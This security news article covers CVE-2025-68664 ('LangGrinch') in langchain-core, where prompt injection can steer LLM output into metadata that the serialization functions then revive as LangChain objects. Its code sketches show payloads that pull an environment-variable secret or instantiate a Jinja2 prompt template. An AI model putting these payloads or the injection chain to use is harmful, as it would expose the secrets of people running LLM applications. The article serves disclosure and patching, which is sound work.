LangChain core vulnerability allows prompt injection and data exposure

Pierluigi Paganini
December 27, 2025

A critical flaw in LangChain Core could allow attackers to steal sensitive secrets and manipulate LLM responses via prompt injection.

LangChain Core (langchain-core) is a key Python package in the LangChain ecosystem that provides core interfaces and model-agnostic tools for building LLM-based applications. A critical vulnerability, tracked as CVE-2025-68664 (CVSS score of 9.3), affects the package. Security researcher Yarden Porat reported the issue on December 4, 2025, and named it LangGrinch.

“A serialization injection vulnerability exists in LangChain’s dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.” reads the advisory.

The vulnerability stems from the dumps() and dumpd() functions, which do not escape user-controlled dictionaries containing “lc” keys. When such data is deserialized with load() or loads(), it is treated as valid LangChain objects instead of user input, allowing attackers to inject malicious object structures through fields like metadata or response data. The flaw also enables instantiation of Serializable classes within trusted LangChain namespaces, including classes with side effects in their initialization, though it cannot be used to load arbitrary external classes.
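In rough terms, the round trip the advisory describes can be sketched as below. This is a minimal illustration, assuming a vulnerable langchain-core build (before 0.3.81 / 1.2.5); the secret-reference payload shape follows LangChain’s own serialization format, and OPENAI_API_KEY stands in for whatever environment variable an attacker targets.

```python
# Conceptual sketch of the injection path described in the advisory. Assumes a
# vulnerable langchain-core build (before 0.3.81 / 1.2.5); the payload shape
# mirrors LangChain's documented "lc" serialization format.
from langchain_core.load import dumps, loads

# Attacker-influenced value (e.g. an LLM output stored as metadata) that
# imitates LangChain's internal marker for a serialized secret.
malicious_metadata = {
    "lc": 1,
    "type": "secret",
    "id": ["OPENAI_API_KEY"],  # name of an environment variable to exfiltrate
}

# The application serializes state that happens to embed the attacker's dict...
blob = dumps({"user_metadata": malicious_metadata})

# ...and later deserializes it. On vulnerable versions the "lc" dict is not
# escaped, so loads() treats it as a secret reference and resolves it from the
# process environment instead of returning it as plain user data.
restored = loads(blob)
print(restored["user_metadata"])  # the value of OPENAI_API_KEY, if set
```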

Cyata researcher Yarden Porat warned that if attackers can force a LangChain orchestration loop to serialize and later deserialize data carrying an “lc” key, unsafe objects may be instantiated.

“So once an attacker is able to make a LangChain orchestration loop serialize and later deserialize content including an ‘lc’ key, they would instantiate an unsafe arbitrary object, potentially triggering many attacker-friendly paths.” wrote Porat.

This can lead to secret leakage from environment variables, instantiation of classes in trusted namespaces like langchain_core or langchain_community, and potentially code execution via Jinja2 templates. The bug also allows object injection through user-controlled fields such as metadata or response data, which an attacker can reach via prompt injection.
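The class-instantiation path uses the same “lc” structure with LangChain’s “constructor” type. The sketch below shows only the general payload shape; the class and kwargs are illustrative, with a harmless placeholder where a real attack would embed Jinja2 logic.

```python
# Illustrative shape of a "constructor" injection per the advisory; on a
# vulnerable build, load()/loads() would instantiate the referenced class from
# a trusted namespace instead of returning the dict as plain data.
injected_object = {
    "lc": 1,
    "type": "constructor",
    # Dotted path into a trusted namespace (here, a langchain_core prompt class)
    "id": ["langchain", "prompts", "prompt", "PromptTemplate"],
    "kwargs": {
        "template": "{{ greeting }}",  # a real attack would carry Jinja2 logic
        "input_variables": ["greeting"],
        "template_format": "jinja2",   # Jinja2 rendering is the code-exec path
    },
}
```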

Porat pointed out that this vulnerability is especially serious because it affects langchain-core itself, not a peripheral tool or edge case. The vulnerable dumps() and dumpd() APIs sit at the heart of a framework deployed at massive scale, with hundreds of millions of installs globally. A single prompt can trigger the flaw indirectly, as LLM outputs may influence metadata that later gets serialized and deserialized during normal operations, making exploitation subtle and far-reaching. Patches are available in langchain-core versions 0.3.81 and 1.2.5.

Users are urged to update to a patched version as soon as possible.
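As a first step, a quick standard-library check of the installed build against the fixed releases might look like this:

```python
# Minimal version check; per the advisory, langchain-core builds earlier than
# 0.3.81 (0.3.x line) or 1.2.5 (1.x line) are affected.
from importlib.metadata import PackageNotFoundError, version

try:
    print(f"langchain-core {version('langchain-core')} installed; fixed: 0.3.81 / 1.2.5")
except PackageNotFoundError:
    print("langchain-core is not installed")
```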

Pierluigi Paganini

(SecurityAffairs – hacking, LangChain)